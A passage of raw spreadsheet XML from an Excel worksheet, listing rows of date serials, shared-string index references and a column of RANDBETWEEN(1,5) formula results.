      <c r="C4316" t="s">
        <v>559</v>
      </c>
      <c r="E4316" t="s">
        <v>4138</v>
      </c>
      <c r="F4316">
        <f t="shared" ca="1" si="67"/>
        <v>2</v>
      </c>
    </row>
    <row r="4317" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4317" s="1">
        <v>43479.111307870371</v>
      </c>
      <c r="B4317" t="s">
        <v>19</v>
      </c>
      <c r="C4317" t="s">
        <v>471</v>
      </c>
      <c r="E4317" t="s">
        <v>4139</v>
      </c>
      <c r="F4317">
        <f t="shared" ca="1" si="67"/>
        <v>3</v>
      </c>
    </row>
    <row r="4318" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4318" s="1">
        <v>43479.088483796295</v>
      </c>
      <c r="B4318" t="s">
        <v>13</v>
      </c>
      <c r="C4318" t="s">
        <v>60</v>
      </c>
      <c r="E4318" s="2" t="s">
        <v>4140</v>
      </c>
      <c r="F4318">
        <f t="shared" ca="1" si="67"/>
        <v>5</v>
      </c>
    </row>
    <row r="4319" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A4319" s="1">
        <v>43479.081863425927</v>
      </c>
      <c r="B4319" t="s">
        <v>5</v>
      </c>
      <c r="C4319" t="s">
        <v>408</v>
      </c>
      <c r="E4319" s="2" t="s">
        <v>4141</v>
      </c>
      <c r="F4319">
        <f t="shared" ca="1" si="67"/>
        <v>3</v>
      </c>
    </row>
    <row r="4320" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4320" s="1">
        <v>43479.068472222221</v>
      </c>
      <c r="B4320" t="s">
        <v>5</v>
      </c>
      <c r="C4320" t="s">
        <v>471</v>
      </c>
      <c r="F4320">
        <f t="shared" ca="1" si="67"/>
        <v>5</v>
      </c>
    </row>
    <row r="4321" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A4321" s="1">
        <v>43479.043576388889</v>
      </c>
      <c r="B4321" t="s">
        <v>5</v>
      </c>
      <c r="C4321" t="s">
        <v>408</v>
      </c>
      <c r="E4321" s="2" t="s">
        <v>4142</v>
      </c>
      <c r="F4321">
        <f t="shared" ca="1" si="67"/>
        <v>5</v>
      </c>
    </row>
    <row r="4322" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A4322" s="1">
        <v>43479.038252314815</v>
      </c>
      <c r="B4322" t="s">
        <v>5</v>
      </c>
      <c r="C4322" t="s">
        <v>253</v>
      </c>
      <c r="E4322" s="2" t="s">
        <v>4143</v>
      </c>
      <c r="F4322">
        <f t="shared" ca="1" si="67"/>
        <v>3</v>
      </c>
    </row>
    <row r="4323" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4323" s="1">
        <v>43478.986574074072</v>
      </c>
      <c r="B4323" t="s">
        <v>19</v>
      </c>
      <c r="C4323" t="s">
        <v>724</v>
      </c>
      <c r="E4323" t="s">
        <v>4144</v>
      </c>
      <c r="F4323">
        <f t="shared" ca="1" si="67"/>
        <v>4</v>
      </c>
    </row>
    <row r="4324" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A4324" s="1">
        <v>43478.928564814814</v>
      </c>
      <c r="B4324" t="s">
        <v>13</v>
      </c>
      <c r="C4324" t="s">
        <v>140</v>
      </c>
      <c r="D4324" t="s">
        <v>141</v>
      </c>
      <c r="E4324" s="2" t="s">
        <v>4145</v>
      </c>
      <c r="F4324">
        <f t="shared" ca="1" si="67"/>
        <v>5</v>
      </c>
    </row>
    <row r="4325" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4325" s="1">
        <v>43478.902025462965</v>
      </c>
      <c r="B4325" t="s">
        <v>5</v>
      </c>
      <c r="C4325" t="s">
        <v>260</v>
      </c>
      <c r="E4325" s="2" t="s">
        <v>4146</v>
      </c>
      <c r="F4325">
        <f t="shared" ca="1" si="67"/>
        <v>5</v>
      </c>
    </row>
    <row r="4326" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4326" s="1">
        <v>43478.811261574076</v>
      </c>
      <c r="B4326" t="s">
        <v>1305</v>
      </c>
      <c r="C4326" t="s">
        <v>10</v>
      </c>
      <c r="D4326" t="s">
        <v>6</v>
      </c>
      <c r="E4326" s="2" t="s">
        <v>4147</v>
      </c>
      <c r="F4326">
        <f t="shared" ca="1" si="67"/>
        <v>4</v>
      </c>
    </row>
    <row r="4327" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4327" s="1">
        <v>43478.753553240742</v>
      </c>
      <c r="B4327" t="s">
        <v>5</v>
      </c>
      <c r="C4327" t="s">
        <v>140</v>
      </c>
      <c r="D4327" t="s">
        <v>141</v>
      </c>
      <c r="E4327" t="s">
        <v>4148</v>
      </c>
      <c r="F4327">
        <f t="shared" ca="1" si="67"/>
        <v>2</v>
      </c>
    </row>
    <row r="4328" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A4328" s="1">
        <v>43478.719525462962</v>
      </c>
      <c r="B4328" t="s">
        <v>5</v>
      </c>
      <c r="C4328" t="s">
        <v>6</v>
      </c>
      <c r="D4328" t="s">
        <v>25</v>
      </c>
      <c r="E4328" s="2" t="s">
        <v>4149</v>
      </c>
      <c r="F4328">
        <f t="shared" ca="1" si="67"/>
        <v>2</v>
      </c>
    </row>
    <row r="4329" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4329" s="1">
        <v>43478.623460648145</v>
      </c>
      <c r="B4329" t="s">
        <v>5</v>
      </c>
      <c r="C4329" t="s">
        <v>301</v>
      </c>
      <c r="E4329" t="s">
        <v>4150</v>
      </c>
      <c r="F4329">
        <f t="shared" ca="1" si="67"/>
        <v>2</v>
      </c>
    </row>
    <row r="4330" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4330" s="1">
        <v>43478.539178240739</v>
      </c>
      <c r="B4330" t="s">
        <v>1305</v>
      </c>
      <c r="C4330" t="s">
        <v>60</v>
      </c>
      <c r="E4330" t="s">
        <v>4151</v>
      </c>
      <c r="F4330">
        <f t="shared" ca="1" si="67"/>
        <v>4</v>
      </c>
    </row>
    <row r="4331" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4331" s="1">
        <v>43478.538252314815</v>
      </c>
      <c r="B4331" t="s">
        <v>19</v>
      </c>
      <c r="C4331" t="s">
        <v>16</v>
      </c>
      <c r="F4331">
        <f t="shared" ca="1" si="67"/>
        <v>2</v>
      </c>
    </row>
    <row r="4332" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4332" s="1">
        <v>43478.527685185189</v>
      </c>
      <c r="B4332" t="s">
        <v>5</v>
      </c>
      <c r="C4332" t="s">
        <v>1263</v>
      </c>
      <c r="E4332" s="2" t="s">
        <v>4152</v>
      </c>
      <c r="F4332">
        <f t="shared" ca="1" si="67"/>
        <v>3</v>
      </c>
    </row>
    <row r="4333" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4333" s="1">
        <v>43478.470578703702</v>
      </c>
      <c r="B4333" t="s">
        <v>5</v>
      </c>
      <c r="C4333" t="s">
        <v>10</v>
      </c>
      <c r="D4333" t="s">
        <v>271</v>
      </c>
      <c r="E4333" s="2" t="s">
        <v>4153</v>
      </c>
      <c r="F4333">
        <f t="shared" ca="1" si="67"/>
        <v>2</v>
      </c>
    </row>
    <row r="4334" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4334" s="1">
        <v>43478.407106481478</v>
      </c>
      <c r="B4334" t="s">
        <v>1305</v>
      </c>
      <c r="C4334" t="s">
        <v>48</v>
      </c>
      <c r="E4334" t="s">
        <v>4154</v>
      </c>
      <c r="F4334">
        <f t="shared" ca="1" si="67"/>
        <v>3</v>
      </c>
    </row>
    <row r="4335" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4335" s="1">
        <v>43478.252905092595</v>
      </c>
      <c r="B4335" t="s">
        <v>5</v>
      </c>
      <c r="C4335" t="s">
        <v>60</v>
      </c>
      <c r="E4335" s="2" t="s">
        <v>4155</v>
      </c>
      <c r="F4335">
        <f t="shared" ca="1" si="67"/>
        <v>1</v>
      </c>
    </row>
    <row r="4336" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4336" s="1">
        <v>43478.212673611109</v>
      </c>
      <c r="B4336" t="s">
        <v>19</v>
      </c>
      <c r="C4336" t="s">
        <v>48</v>
      </c>
      <c r="E4336" t="s">
        <v>4156</v>
      </c>
      <c r="F4336">
        <f t="shared" ca="1" si="67"/>
        <v>4</v>
      </c>
    </row>
    <row r="4337" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4337" s="1">
        <v>43478.026932870373</v>
      </c>
      <c r="B4337" t="s">
        <v>19</v>
      </c>
      <c r="C4337" t="s">
        <v>253</v>
      </c>
      <c r="E4337" t="s">
        <v>4157</v>
      </c>
      <c r="F4337">
        <f t="shared" ca="1" si="67"/>
        <v>3</v>
      </c>
    </row>
    <row r="4338" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4338" s="1">
        <v>43478.026898148149</v>
      </c>
      <c r="B4338" t="s">
        <v>19</v>
      </c>
      <c r="C4338" t="s">
        <v>253</v>
      </c>
      <c r="E4338" t="s">
        <v>4157</v>
      </c>
      <c r="F4338">
        <f t="shared" ca="1" si="67"/>
        <v>1</v>
      </c>
    </row>
    <row r="4339" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4339" s="1">
        <v>43477.758055555554</v>
      </c>
      <c r="B4339" t="s">
        <v>1305</v>
      </c>
      <c r="C4339" t="s">
        <v>189</v>
      </c>
      <c r="E4339" s="2" t="s">
        <v>4158</v>
      </c>
      <c r="F4339">
        <f t="shared" ca="1" si="67"/>
        <v>1</v>
      </c>
    </row>
    <row r="4340" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4340" s="1">
        <v>43477.645671296297</v>
      </c>
      <c r="B4340" t="s">
        <v>1305</v>
      </c>
      <c r="C4340" t="s">
        <v>65</v>
      </c>
      <c r="E4340" t="s">
        <v>604</v>
      </c>
      <c r="F4340">
        <f t="shared" ca="1" si="67"/>
        <v>1</v>
      </c>
    </row>
    <row r="4341" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4341" s="1">
        <v>43477.591400462959</v>
      </c>
      <c r="B4341" t="s">
        <v>13</v>
      </c>
      <c r="C4341" t="s">
        <v>708</v>
      </c>
      <c r="E4341" t="s">
        <v>4159</v>
      </c>
      <c r="F4341">
        <f t="shared" ca="1" si="67"/>
        <v>4</v>
      </c>
    </row>
    <row r="4342" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4342" s="1">
        <v>43477.401759259257</v>
      </c>
      <c r="B4342" t="s">
        <v>5</v>
      </c>
      <c r="C4342" t="s">
        <v>60</v>
      </c>
      <c r="E4342" s="2" t="s">
        <v>4160</v>
      </c>
      <c r="F4342">
        <f t="shared" ca="1" si="67"/>
        <v>1</v>
      </c>
    </row>
    <row r="4343" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4343" s="1">
        <v>43477.401562500003</v>
      </c>
      <c r="B4343" t="s">
        <v>5</v>
      </c>
      <c r="C4343" t="s">
        <v>60</v>
      </c>
      <c r="E4343" s="2" t="s">
        <v>4160</v>
      </c>
      <c r="F4343">
        <f t="shared" ca="1" si="67"/>
        <v>4</v>
      </c>
    </row>
    <row r="4344" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4344" s="1">
        <v>43477.399317129632</v>
      </c>
      <c r="B4344" t="s">
        <v>5</v>
      </c>
      <c r="C4344" t="s">
        <v>60</v>
      </c>
      <c r="E4344" s="2" t="s">
        <v>4160</v>
      </c>
      <c r="F4344">
        <f t="shared" ca="1" si="67"/>
        <v>2</v>
      </c>
    </row>
    <row r="4345" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4345" s="1">
        <v>43477.388229166667</v>
      </c>
      <c r="B4345" t="s">
        <v>13</v>
      </c>
      <c r="C4345" t="s">
        <v>71</v>
      </c>
      <c r="E4345" s="2" t="s">
        <v>4161</v>
      </c>
      <c r="F4345">
        <f t="shared" ca="1" si="67"/>
        <v>4</v>
      </c>
    </row>
    <row r="4346" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4346" s="1">
        <v>43477.368576388886</v>
      </c>
      <c r="B4346" t="s">
        <v>19</v>
      </c>
      <c r="C4346" t="s">
        <v>1179</v>
      </c>
      <c r="E4346" t="s">
        <v>4162</v>
      </c>
      <c r="F4346">
        <f t="shared" ca="1" si="67"/>
        <v>2</v>
      </c>
    </row>
    <row r="4347" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4347" s="1">
        <v>43477.322199074071</v>
      </c>
      <c r="B4347" t="s">
        <v>5</v>
      </c>
      <c r="C4347" t="s">
        <v>41</v>
      </c>
      <c r="E4347" t="s">
        <v>4163</v>
      </c>
      <c r="F4347">
        <f t="shared" ca="1" si="67"/>
        <v>3</v>
      </c>
    </row>
    <row r="4348" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4348" s="1">
        <v>43477.298333333332</v>
      </c>
      <c r="B4348" t="s">
        <v>5</v>
      </c>
      <c r="C4348" t="s">
        <v>253</v>
      </c>
      <c r="E4348">
        <v>9266603389</v>
      </c>
      <c r="F4348">
        <f t="shared" ca="1" si="67"/>
        <v>2</v>
      </c>
    </row>
    <row r="4349" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4349" s="1">
        <v>43477.221574074072</v>
      </c>
      <c r="B4349" t="s">
        <v>13</v>
      </c>
      <c r="C4349" t="s">
        <v>97</v>
      </c>
      <c r="E4349" t="s">
        <v>4164</v>
      </c>
      <c r="F4349">
        <f t="shared" ca="1" si="67"/>
        <v>2</v>
      </c>
    </row>
    <row r="4350" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4350" s="1">
        <v>43477.205439814818</v>
      </c>
      <c r="B4350" t="s">
        <v>5</v>
      </c>
      <c r="C4350" t="s">
        <v>10</v>
      </c>
      <c r="D4350" t="s">
        <v>20</v>
      </c>
      <c r="E4350" t="s">
        <v>4165</v>
      </c>
      <c r="F4350">
        <f t="shared" ca="1" si="67"/>
        <v>1</v>
      </c>
    </row>
    <row r="4351" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4351" s="1">
        <v>43477.167222222219</v>
      </c>
      <c r="B4351" t="s">
        <v>5</v>
      </c>
      <c r="C4351" t="s">
        <v>41</v>
      </c>
      <c r="E4351" s="2" t="s">
        <v>4166</v>
      </c>
      <c r="F4351">
        <f t="shared" ca="1" si="67"/>
        <v>2</v>
      </c>
    </row>
    <row r="4352" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A4352" s="1">
        <v>43477.063414351855</v>
      </c>
      <c r="B4352" t="s">
        <v>5</v>
      </c>
      <c r="C4352" t="s">
        <v>41</v>
      </c>
      <c r="E4352" s="2" t="s">
        <v>4167</v>
      </c>
      <c r="F4352">
        <f t="shared" ca="1" si="67"/>
        <v>1</v>
      </c>
    </row>
    <row r="4353" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A4353" s="1">
        <v>43476.961759259262</v>
      </c>
      <c r="B4353" t="s">
        <v>5</v>
      </c>
      <c r="C4353" t="s">
        <v>10</v>
      </c>
      <c r="D4353" t="s">
        <v>52</v>
      </c>
      <c r="E4353" s="2" t="s">
        <v>4168</v>
      </c>
      <c r="F4353">
        <f t="shared" ca="1" si="67"/>
        <v>3</v>
      </c>
    </row>
    <row r="4354" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4354" s="1">
        <v>43476.960266203707</v>
      </c>
      <c r="B4354" t="s">
        <v>5</v>
      </c>
      <c r="C4354" t="s">
        <v>73</v>
      </c>
      <c r="F4354">
        <f t="shared" ref="F4354:F4417" ca="1" si="68">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="4355" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4355" s="1">
        <v>43476.774745370371</v>
      </c>
      <c r="B4355" t="s">
        <v>13</v>
      </c>
      <c r="C4355" t="s">
        <v>10</v>
      </c>
      <c r="D4355" t="s">
        <v>6</v>
      </c>
      <c r="E4355" t="s">
        <v>4169</v>
      </c>
      <c r="F4355">
        <f t="shared" ca="1" si="68"/>
        <v>5</v>
      </c>
    </row>
    <row r="4356" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4356" s="1">
        <v>43476.702615740738</v>
      </c>
      <c r="B4356" t="s">
        <v>5</v>
      </c>
      <c r="C4356" t="s">
        <v>10</v>
      </c>
      <c r="D4356" t="s">
        <v>667</v>
      </c>
      <c r="E4356" t="s">
        <v>4170</v>
      </c>
      <c r="F4356">
        <f t="shared" ca="1" si="68"/>
        <v>5</v>
      </c>
    </row>
    <row r="4357" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4357" s="1">
        <v>43476.688518518517</v>
      </c>
      <c r="B4357" t="s">
        <v>5</v>
      </c>
      <c r="C4357" t="s">
        <v>10</v>
      </c>
      <c r="D4357" t="s">
        <v>178</v>
      </c>
      <c r="E4357" s="2" t="s">
        <v>4171</v>
      </c>
      <c r="F4357">
        <f t="shared" ca="1" si="68"/>
        <v>1</v>
      </c>
    </row>
    <row r="4358" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4358" s="1">
        <v>43476.681192129632</v>
      </c>
      <c r="B4358" t="s">
        <v>13</v>
      </c>
      <c r="C4358" t="s">
        <v>10</v>
      </c>
      <c r="D4358" t="s">
        <v>89</v>
      </c>
      <c r="E4358" t="s">
        <v>4172</v>
      </c>
      <c r="F4358">
        <f t="shared" ca="1" si="68"/>
        <v>3</v>
      </c>
    </row>
    <row r="4359" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4359" s="1">
        <v>43476.672129629631</v>
      </c>
      <c r="B4359" t="s">
        <v>13</v>
      </c>
      <c r="C4359" t="s">
        <v>10</v>
      </c>
      <c r="D4359" t="s">
        <v>251</v>
      </c>
      <c r="E4359" t="s">
        <v>4173</v>
      </c>
      <c r="F4359">
        <f t="shared" ca="1" si="68"/>
        <v>2</v>
      </c>
    </row>
    <row r="4360" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4360" s="1">
        <v>43476.671157407407</v>
      </c>
      <c r="B4360" t="s">
        <v>5</v>
      </c>
      <c r="C4360" t="s">
        <v>6</v>
      </c>
      <c r="D4360" t="s">
        <v>25</v>
      </c>
      <c r="E4360" t="s">
        <v>4174</v>
      </c>
      <c r="F4360">
        <f t="shared" ca="1" si="68"/>
        <v>2</v>
      </c>
    </row>
    <row r="4361" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4361" s="1">
        <v>43476.652025462965</v>
      </c>
      <c r="B4361" t="s">
        <v>19</v>
      </c>
      <c r="C4361" t="s">
        <v>10</v>
      </c>
      <c r="D4361" t="s">
        <v>112</v>
      </c>
      <c r="E4361" s="2" t="s">
        <v>4175</v>
      </c>
      <c r="F4361">
        <f t="shared" ca="1" si="68"/>
        <v>1</v>
      </c>
    </row>
    <row r="4362" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4362" s="1">
        <v>43476.650625000002</v>
      </c>
      <c r="B4362" t="s">
        <v>13</v>
      </c>
      <c r="C4362" t="s">
        <v>10</v>
      </c>
      <c r="D4362" t="s">
        <v>89</v>
      </c>
      <c r="E4362" s="2" t="s">
        <v>4176</v>
      </c>
      <c r="F4362">
        <f t="shared" ca="1" si="68"/>
        <v>4</v>
      </c>
    </row>
    <row r="4363" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4363" s="1">
        <v>43476.634722222225</v>
      </c>
      <c r="B4363" t="s">
        <v>13</v>
      </c>
      <c r="C4363" t="s">
        <v>260</v>
      </c>
      <c r="E4363" t="s">
        <v>4177</v>
      </c>
      <c r="F4363">
        <f t="shared" ca="1" si="68"/>
        <v>3</v>
      </c>
    </row>
    <row r="4364" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4364" s="1">
        <v>43476.631851851853</v>
      </c>
      <c r="B4364" t="s">
        <v>1305</v>
      </c>
      <c r="C4364" t="s">
        <v>10</v>
      </c>
      <c r="D4364" t="s">
        <v>86</v>
      </c>
      <c r="E4364" t="s">
        <v>4178</v>
      </c>
      <c r="F4364">
        <f t="shared" ca="1" si="68"/>
        <v>1</v>
      </c>
    </row>
    <row r="4365" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4365" s="1">
        <v>43476.621203703704</v>
      </c>
      <c r="B4365" t="s">
        <v>13</v>
      </c>
      <c r="C4365" t="s">
        <v>10</v>
      </c>
      <c r="D4365" t="s">
        <v>6</v>
      </c>
      <c r="E4365" s="2" t="s">
        <v>4179</v>
      </c>
      <c r="F4365">
        <f t="shared" ca="1" si="68"/>
        <v>4</v>
      </c>
    </row>
    <row r="4366" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4366" s="1">
        <v>43476.605925925927</v>
      </c>
      <c r="B4366" t="s">
        <v>5</v>
      </c>
      <c r="C4366" t="s">
        <v>10</v>
      </c>
      <c r="D4366" t="s">
        <v>17</v>
      </c>
      <c r="E4366" t="s">
        <v>4180</v>
      </c>
      <c r="F4366">
        <f t="shared" ca="1" si="68"/>
        <v>1</v>
      </c>
    </row>
    <row r="4367" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4367" s="1">
        <v>43476.603854166664</v>
      </c>
      <c r="B4367" t="s">
        <v>19</v>
      </c>
      <c r="C4367" t="s">
        <v>41</v>
      </c>
      <c r="E4367" t="s">
        <v>4181</v>
      </c>
      <c r="F4367">
        <f t="shared" ca="1" si="68"/>
        <v>2</v>
      </c>
    </row>
    <row r="4368" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4368" s="1">
        <v>43476.60328703704</v>
      </c>
      <c r="B4368" t="s">
        <v>19</v>
      </c>
      <c r="C4368" t="s">
        <v>10</v>
      </c>
      <c r="D4368" t="s">
        <v>56</v>
      </c>
      <c r="E4368" t="s">
        <v>4182</v>
      </c>
      <c r="F4368">
        <f t="shared" ca="1" si="68"/>
        <v>1</v>
      </c>
    </row>
    <row r="4369" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4369" s="1">
        <v>43476.586782407408</v>
      </c>
      <c r="B4369" t="s">
        <v>19</v>
      </c>
      <c r="C4369" t="s">
        <v>6</v>
      </c>
      <c r="D4369" t="s">
        <v>821</v>
      </c>
      <c r="E4369" t="s">
        <v>4183</v>
      </c>
      <c r="F4369">
        <f t="shared" ca="1" si="68"/>
        <v>1</v>
      </c>
    </row>
    <row r="4370" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A4370" s="1">
        <v>43476.577164351853</v>
      </c>
      <c r="B4370" t="s">
        <v>5</v>
      </c>
      <c r="C4370" t="s">
        <v>6</v>
      </c>
      <c r="D4370" t="s">
        <v>25</v>
      </c>
      <c r="E4370" s="2" t="s">
        <v>4184</v>
      </c>
      <c r="F4370">
        <f t="shared" ca="1" si="68"/>
        <v>2</v>
      </c>
    </row>
    <row r="4371" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4371" s="1">
        <v>43476.57267361111</v>
      </c>
      <c r="B4371" t="s">
        <v>19</v>
      </c>
      <c r="C4371" t="s">
        <v>10</v>
      </c>
      <c r="D4371" t="s">
        <v>6</v>
      </c>
      <c r="E4371" t="s">
        <v>4185</v>
      </c>
      <c r="F4371">
        <f t="shared" ca="1" si="68"/>
        <v>2</v>
      </c>
    </row>
    <row r="4372" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A4372" s="1">
        <v>43476.547500000001</v>
      </c>
      <c r="B4372" t="s">
        <v>35</v>
      </c>
      <c r="C4372" t="s">
        <v>41</v>
      </c>
      <c r="E4372" s="2" t="s">
        <v>4186</v>
      </c>
      <c r="F4372">
        <f t="shared" ca="1" si="68"/>
        <v>4</v>
      </c>
    </row>
    <row r="4373" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4373" s="1">
        <v>43476.541759259257</v>
      </c>
      <c r="B4373" t="s">
        <v>19</v>
      </c>
      <c r="C4373" t="s">
        <v>10</v>
      </c>
      <c r="D4373" t="s">
        <v>6</v>
      </c>
      <c r="E4373" t="s">
        <v>4187</v>
      </c>
      <c r="F4373">
        <f t="shared" ca="1" si="68"/>
        <v>2</v>
      </c>
    </row>
    <row r="4374" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4374" s="1">
        <v>43476.494687500002</v>
      </c>
      <c r="B4374" t="s">
        <v>13</v>
      </c>
      <c r="C4374" t="s">
        <v>10</v>
      </c>
      <c r="D4374" t="s">
        <v>36</v>
      </c>
      <c r="E4374" t="s">
        <v>4188</v>
      </c>
      <c r="F4374">
        <f t="shared" ca="1" si="68"/>
        <v>5</v>
      </c>
    </row>
    <row r="4375" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A4375" s="1">
        <v>43476.492361111108</v>
      </c>
      <c r="B4375" t="s">
        <v>19</v>
      </c>
      <c r="C4375" t="s">
        <v>6</v>
      </c>
      <c r="D4375" t="s">
        <v>25</v>
      </c>
      <c r="E4375" s="2" t="s">
        <v>4189</v>
      </c>
      <c r="F4375">
        <f t="shared" ca="1" si="68"/>
        <v>1</v>
      </c>
    </row>
    <row r="4376" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4376" s="1">
        <v>43476.49019675926</v>
      </c>
      <c r="B4376" t="s">
        <v>5</v>
      </c>
      <c r="C4376" t="s">
        <v>10</v>
      </c>
      <c r="D4376" t="s">
        <v>178</v>
      </c>
      <c r="E4376" t="s">
        <v>4190</v>
      </c>
      <c r="F4376">
        <f t="shared" ca="1" si="68"/>
        <v>2</v>
      </c>
    </row>
    <row r="4377" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4377" s="1">
        <v>43476.48337962963</v>
      </c>
      <c r="B4377" t="s">
        <v>13</v>
      </c>
      <c r="C4377" t="s">
        <v>10</v>
      </c>
      <c r="D4377" t="s">
        <v>80</v>
      </c>
      <c r="E4377" t="s">
        <v>4191</v>
      </c>
      <c r="F4377">
        <f t="shared" ca="1" si="68"/>
        <v>3</v>
      </c>
    </row>
    <row r="4378" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4378" s="1">
        <v>43476.482164351852</v>
      </c>
      <c r="B4378" t="s">
        <v>19</v>
      </c>
      <c r="C4378" t="s">
        <v>258</v>
      </c>
      <c r="E4378" s="2" t="s">
        <v>4192</v>
      </c>
      <c r="F4378">
        <f t="shared" ca="1" si="68"/>
        <v>3</v>
      </c>
    </row>
    <row r="4379" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4379" s="1">
        <v>43476.477916666663</v>
      </c>
      <c r="B4379" t="s">
        <v>5</v>
      </c>
      <c r="C4379" t="s">
        <v>6</v>
      </c>
      <c r="D4379" t="s">
        <v>25</v>
      </c>
      <c r="E4379" t="s">
        <v>4193</v>
      </c>
      <c r="F4379">
        <f t="shared" ca="1" si="68"/>
        <v>5</v>
      </c>
    </row>
    <row r="4380" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4380" s="1">
        <v>43476.460833333331</v>
      </c>
      <c r="B4380" t="s">
        <v>13</v>
      </c>
      <c r="C4380" t="s">
        <v>10</v>
      </c>
      <c r="D4380" t="s">
        <v>290</v>
      </c>
      <c r="E4380" t="s">
        <v>4194</v>
      </c>
      <c r="F4380">
        <f t="shared" ca="1" si="68"/>
        <v>3</v>
      </c>
    </row>
    <row r="4381" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4381" s="1">
        <v>43476.438067129631</v>
      </c>
      <c r="B4381" t="s">
        <v>19</v>
      </c>
      <c r="C4381" t="s">
        <v>10</v>
      </c>
      <c r="D4381" t="s">
        <v>6</v>
      </c>
      <c r="E4381" t="s">
        <v>4195</v>
      </c>
      <c r="F4381">
        <f t="shared" ca="1" si="68"/>
        <v>5</v>
      </c>
    </row>
    <row r="4382" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4382" s="1">
        <v>43476.432604166665</v>
      </c>
      <c r="B4382" t="s">
        <v>19</v>
      </c>
      <c r="C4382" t="s">
        <v>10</v>
      </c>
      <c r="D4382" t="s">
        <v>112</v>
      </c>
      <c r="E4382" t="s">
        <v>4196</v>
      </c>
      <c r="F4382">
        <f t="shared" ca="1" si="68"/>
        <v>5</v>
      </c>
    </row>
    <row r="4383" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4383" s="1">
        <v>43476.431226851855</v>
      </c>
      <c r="B4383" t="s">
        <v>19</v>
      </c>
      <c r="C4383" t="s">
        <v>43</v>
      </c>
      <c r="E4383" s="2" t="s">
        <v>4197</v>
      </c>
      <c r="F4383">
        <f t="shared" ca="1" si="68"/>
        <v>1</v>
      </c>
    </row>
    <row r="4384" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4384" s="1">
        <v>43476.414675925924</v>
      </c>
      <c r="B4384" t="s">
        <v>1305</v>
      </c>
      <c r="C4384" t="s">
        <v>260</v>
      </c>
      <c r="E4384" t="s">
        <v>4198</v>
      </c>
      <c r="F4384">
        <f t="shared" ca="1" si="68"/>
        <v>1</v>
      </c>
    </row>
    <row r="4385" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4385" s="1">
        <v>43476.399131944447</v>
      </c>
      <c r="B4385" t="s">
        <v>5</v>
      </c>
      <c r="C4385" t="s">
        <v>41</v>
      </c>
      <c r="E4385" t="s">
        <v>4199</v>
      </c>
      <c r="F4385">
        <f t="shared" ca="1" si="68"/>
        <v>5</v>
      </c>
    </row>
    <row r="4386" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4386" s="1">
        <v>43476.395891203705</v>
      </c>
      <c r="B4386" t="s">
        <v>5</v>
      </c>
